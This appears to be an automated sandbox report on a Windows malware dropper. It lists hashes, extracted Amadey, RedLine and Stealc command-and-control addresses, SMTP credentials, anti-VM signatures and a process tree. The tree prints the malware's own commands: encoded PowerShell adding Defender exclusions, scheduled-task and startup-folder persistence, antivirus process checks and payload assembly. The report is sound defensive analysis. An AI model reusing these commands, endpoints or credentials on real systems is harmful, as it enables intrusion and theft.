Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13-08-2024 01:13
Static task
static1
Behavioral task
behavioral1
Sample
4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe
Resource
win10v2004-20240802-en
General
-
Target
4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe
-
Size
1.8MB
-
MD5
80f73c8cbbe5599b4e21e4956023116d
-
SHA1
102c906a769b228996cdfee698fe02cc8d8487e7
-
SHA256
4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d
-
SHA512
a90995e9340d2696d3b635f199c7f4e7e010633536234c24f2731c29815303f04c807fb71915c4e3c60a0431405553c06b25431644987cfde0e6eca961c5a68c
-
SSDEEP
49152:N6TRoHP8EL8svVnx9SeasvO3ug4PGSUYiIg0e:NiRSPZRPSeE4PG/XIg0e
Malware Config
Extracted
Protocol: smtp- Host:
wightman.ca - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
smtp.frontiernet.net - Port:
587 - Username:
[email protected] - Password:
28966516
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
185.215.113.67:21405
Extracted
stealc
default
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
redline
BUY TG @FATHEROFCARDERS
45.66.231.214:9932
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/files/0x000500000001941f-91.dat family_redline behavioral1/memory/1132-101-0x0000000001230000-0x0000000001282000-memory.dmp family_redline behavioral1/files/0x0005000000019468-127.dat family_redline behavioral1/memory/888-137-0x00000000009B0000-0x0000000000A02000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2540 created 1204 2540 Beijing.pif 21 PID 2540 created 1204 2540 Beijing.pif 21 -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rorukal.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions rorukal.exe -
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools rorukal.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url cmd.exe -
Executes dropped EXE 18 IoCs
pid Process 2744 axplong.exe 1484 GOLD.exe 2820 crypteda.exe 112 newalp.exe 2404 Hkbsse.exe 1132 06082025.exe 680 stealc_default.exe 888 MYNEWRDX.exe 3020 rorukal.exe 2036 runtime.exe 2540 Beijing.pif 2452 Ukodbcdcl.exe 1204 Explorer.EXE 6572 Ukodbcdcl.exe 6900 ajujnub.exe 6172 ajujnub.exe 2644 ajujnub.exe 5188 ajujnub.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Wine 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Wine axplong.exe -
Loads dropped DLL 32 IoCs
pid Process 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 2744 axplong.exe 2744 axplong.exe 2244 WerFault.exe 2244 WerFault.exe 2244 WerFault.exe 2744 axplong.exe 2744 axplong.exe 2744 axplong.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 112 newalp.exe 2744 axplong.exe 2744 axplong.exe 2744 axplong.exe 2744 axplong.exe 680 stealc_default.exe 680 stealc_default.exe 2744 axplong.exe 2744 axplong.exe 864 cmd.exe 2744 axplong.exe 2452 Ukodbcdcl.exe 2540 Beijing.pif 6816 WerFault.exe 6816 WerFault.exe 6816 WerFault.exe 6816 WerFault.exe 6816 WerFault.exe 6816 WerFault.exe 6816 WerFault.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nvaurnhq = "C:\\Users\\Admin\\AppData\\Roaming\\Nvaurnhq.exe" Ukodbcdcl.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3032 tasklist.exe 1308 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 2744 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2452 set thread context of 6572 2452 Ukodbcdcl.exe 67 PID 6900 set thread context of 6172 6900 ajujnub.exe 73 PID 2644 set thread context of 5188 2644 ajujnub.exe 75 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN rorukal.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\EquationExplorer runtime.exe File opened for modification C:\Windows\TreeProfessor runtime.exe File opened for modification C:\Windows\SysOrleans runtime.exe File opened for modification C:\Windows\HostelGalleries runtime.exe File opened for modification C:\Windows\ConfiguringUps runtime.exe File created C:\Windows\Tasks\Test Task17.job Ukodbcdcl.exe File opened for modification C:\Windows\ChestAntique runtime.exe File created C:\Windows\Tasks\Hkbsse.job newalp.exe File opened for modification C:\Windows\ExplorerProprietary runtime.exe File created C:\Windows\Tasks\axplong.job 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2244 1484 WerFault.exe 33 316 2820 WerFault.exe 36 -
System Location Discovery: System Language Discovery 1 TTPs 30 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newalp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GOLD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ukodbcdcl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajujnub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Beijing.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ukodbcdcl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajujnub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajujnub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajujnub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MYNEWRDX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language runtime.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypteda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06082025.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 2744 axplong.exe 680 stealc_default.exe 888 MYNEWRDX.exe 888 MYNEWRDX.exe 888 MYNEWRDX.exe 680 stealc_default.exe 1132 06082025.exe 1132 06082025.exe 1132 06082025.exe 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 3020 rorukal.exe 6464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 888 MYNEWRDX.exe Token: SeDebugPrivilege 1132 06082025.exe Token: SeDebugPrivilege 3032 tasklist.exe Token: SeDebugPrivilege 1308 tasklist.exe Token: SeDebugPrivilege 2452 Ukodbcdcl.exe Token: SeDebugPrivilege 6464 powershell.exe Token: SeDebugPrivilege 2452 Ukodbcdcl.exe Token: SeDebugPrivilege 6900 ajujnub.exe Token: SeDebugPrivilege 6900 ajujnub.exe Token: SeDebugPrivilege 2644 ajujnub.exe Token: SeDebugPrivilege 2644 ajujnub.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 112 newalp.exe 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2540 Beijing.pif 2540 Beijing.pif 2540 Beijing.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2368 wrote to memory of 2744 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 30 PID 2368 wrote to memory of 2744 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 30 PID 2368 wrote to memory of 2744 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 30 PID 2368 wrote to memory of 2744 2368 4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe 30 PID 2744 wrote to memory of 1484 2744 axplong.exe 33 PID 2744 wrote to memory of 1484 2744 axplong.exe 33 PID 2744 wrote to memory of 1484 2744 axplong.exe 33 PID 2744 wrote to memory of 1484 2744 axplong.exe 33 PID 1484 wrote to memory of 2244 1484 GOLD.exe 35 PID 1484 wrote to memory of 2244 1484 GOLD.exe 35 PID 1484 wrote to memory of 2244 1484 GOLD.exe 35 PID 1484 wrote to memory of 2244 1484 GOLD.exe 35 PID 2744 wrote to memory of 2820 2744 axplong.exe 36 PID 2744 wrote to memory of 2820 2744 axplong.exe 36 PID 2744 wrote to memory of 2820 2744 axplong.exe 36 PID 2744 wrote to memory of 2820 2744 axplong.exe 36 PID 2744 wrote to memory of 112 2744 axplong.exe 38 PID 2744 wrote to memory of 112 2744 axplong.exe 38 PID 2744 wrote to memory of 112 2744 axplong.exe 38 PID 2744 wrote to memory of 112 2744 axplong.exe 38 PID 2820 wrote to memory of 316 2820 crypteda.exe 39 PID 2820 wrote to memory of 316 2820 crypteda.exe 39 PID 2820 wrote to memory of 316 2820 crypteda.exe 39 PID 2820 wrote to memory of 316 2820 crypteda.exe 39 PID 112 wrote to memory of 2404 112 newalp.exe 40 PID 112 wrote to memory of 2404 112 newalp.exe 40 PID 112 wrote to memory of 2404 112 newalp.exe 40 PID 112 wrote to memory of 2404 112 newalp.exe 40 PID 2744 wrote to memory of 1132 2744 axplong.exe 41 PID 2744 wrote to memory of 1132 2744 axplong.exe 41 PID 2744 wrote to memory of 1132 2744 axplong.exe 41 PID 2744 wrote to memory of 1132 2744 axplong.exe 41 PID 2744 wrote to memory of 680 2744 axplong.exe 42 PID 2744 wrote to memory of 680 2744 axplong.exe 42 PID 2744 wrote to memory of 680 2744 axplong.exe 42 PID 2744 wrote to memory of 680 2744 axplong.exe 42 PID 2744 wrote to memory of 888 2744 axplong.exe 44 PID 2744 wrote to memory of 888 2744 axplong.exe 44 PID 2744 wrote to memory of 888 2744 axplong.exe 44 PID 2744 wrote to memory of 888 2744 axplong.exe 44 PID 2744 wrote to memory of 3020 2744 axplong.exe 46 PID 2744 wrote to memory of 3020 2744 axplong.exe 46 PID 2744 wrote to memory of 3020 2744 axplong.exe 46 PID 2744 wrote to memory of 3020 2744 axplong.exe 46 PID 2744 wrote to memory of 2036 2744 axplong.exe 47 PID 2744 wrote to memory of 2036 2744 axplong.exe 47 PID 2744 wrote to memory of 2036 2744 axplong.exe 47 PID 2744 wrote to memory of 2036 2744 axplong.exe 47 PID 2036 wrote to memory of 864 2036 runtime.exe 48 PID 2036 wrote to memory of 864 2036 runtime.exe 48 PID 2036 wrote to memory of 864 2036 runtime.exe 48 PID 2036 wrote to memory of 864 2036 runtime.exe 48 PID 864 wrote to memory of 3032 864 cmd.exe 50 PID 864 wrote to memory of 3032 864 cmd.exe 50 PID 864 wrote to memory of 3032 864 cmd.exe 50 PID 864 wrote to memory of 3032 864 cmd.exe 50 PID 864 wrote to memory of 1340 864 cmd.exe 51 PID 864 wrote to memory of 1340 864 cmd.exe 51 PID 864 wrote to memory of 1340 864 cmd.exe 51 PID 864 wrote to memory of 1340 864 cmd.exe 51 PID 864 wrote to memory of 1308 864 cmd.exe 52 PID 864 wrote to memory of 1308 864 cmd.exe 52 PID 864 wrote to memory of 1308 864 cmd.exe 52 PID 864 wrote to memory of 1308 864 cmd.exe 52
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe"C:\Users\Admin\AppData\Local\Temp\4098e2b8d80778d1c4f1c2cf36d6665175991c32dd1b73609bad0f8eb4c9271d.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 645⤵
- Loads dropped DLL
- Program crash
PID:2244
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 645⤵
- Loads dropped DLL
- Program crash
PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2404
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:680
-
-
C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe"C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Users\Admin\AppData\Local\Temp\1000120101\rorukal.exe"C:\Users\Admin\AppData\Local\Temp\1000120101\rorukal.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
PID:3020 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3020 -s 2205⤵
- Loads dropped DLL
PID:6816
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000123001\runtime.exe"C:\Users\Admin\AppData\Local\Temp\1000123001\runtime.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1340
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 403656⤵
- System Location Discovery: System Language Discovery
PID:1948
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "HopeBuildersGeniusIslam" Sonic6⤵
- System Location Discovery: System Language Discovery
PID:912
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s6⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pifBeijing.pif s6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif"C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif"7⤵PID:6736
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAAxADIANQAwADAAMQBcAFUAawBvAGQAYgBjAGQAYwBsAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADAAMQAyADUAMAAwADEAXABVAGsAbwBkAGIAYwBkAGMAbAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATgB2AGEAdQByAG4AaABxAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AdgBhAHUAcgBuAGgAcQAuAGUAeABlAA==5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6464
-
-
C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6572
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:1996 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2160
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B9A38F05-649B-45D0-835B-F7FDC165471E} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]1⤵PID:6868
-
C:\ProgramData\qxjv\ajujnub.exeC:\ProgramData\qxjv\ajujnub.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6900 -
C:\ProgramData\qxjv\ajujnub.exe"C:\ProgramData\qxjv\ajujnub.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6172
-
-
-
C:\ProgramData\qxjv\ajujnub.exeC:\ProgramData\qxjv\ajujnub.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2644 -
C:\ProgramData\qxjv\ajujnub.exe"C:\ProgramData\qxjv\ajujnub.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5188
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
